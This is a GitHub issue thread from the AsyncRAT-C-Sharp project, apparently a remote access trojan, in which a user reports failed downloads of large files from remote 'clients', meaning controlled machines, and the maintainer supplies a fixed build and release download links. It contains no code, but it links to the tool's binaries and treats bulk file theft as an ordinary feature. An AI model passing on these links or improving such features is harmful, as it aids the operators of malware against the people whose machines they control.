### ISSUE TITLE
Unable to download files of 500mb and above

### ISSUE THREAD

**Issue by enkianu** [NYAN-x-CAT/AsyncRAT-C-Sharp#68]
I've tried downloading from several clients, files of over 500mb. However, once it completes download, i don't see the file in the client folder. I've tried doing this severally but same result. I've even tried downloading smaller files of about 50mb from same sources and there are no issues with that.

Just wanted to bring this to your attention. Great work though!

**Comment by NYAN-x-CAT** [comment]
Thank you for this feedback. Can you test it again using this version?
[Release_Test1.zip](https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/files/3292544/Release_Test1.zip)

**Comment by enkianu** [comment]
Ok.. I'll give a review after trying this out.

**Comment by enkianu** [comment]
> Thank you for this feedback. Can you test it again using this version?
> [Release_Test1.zip](https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/files/3292544/Release_Test1.zip)

Hi Nyan,  the Test-Release version worked like a charm.

**Comment by NYAN-x-CAT** [comment]
I updated the source. Thank you.

**Comment by NYAN-x-CAT** [comment]
DW:https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/releases/download/v0.4.9G/AsyncRAT.v0.4.9G.zip

**Comment by enkianu** [comment]
> DW:https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/releases/download/v0.4.9G/AsyncRAT.v0.4.9G.zip

Fantastic Job

**Comment by Komischerboy** [comment]
it doesn't work anymore :/
